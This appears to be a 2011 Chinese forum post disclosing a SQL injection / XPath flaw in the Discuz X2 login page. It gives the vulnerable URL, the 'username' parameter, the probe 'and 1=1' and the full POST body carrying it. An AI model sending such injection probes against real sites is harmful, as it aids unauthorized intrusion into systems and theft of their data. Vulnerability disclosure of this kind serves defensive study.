Discuz X2 SQL注入/Xpath 最新漏洞2011年8月19日
Discuz X2 SQL注入/Xpath 最新漏洞发表时间:2011年8月19日 17:06 发布人: 坏客点击:27次漏洞类型:SQL注入/Xpath请求方式:POST
影响页面:http://127.0.0.1/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
参数:username
参数测试:and 1=1
攻击细节:username=1+and+1=1&cookietime=2592000&password=1&quickforward=yes&handlekey=ls&fastloginfield
页:
[1]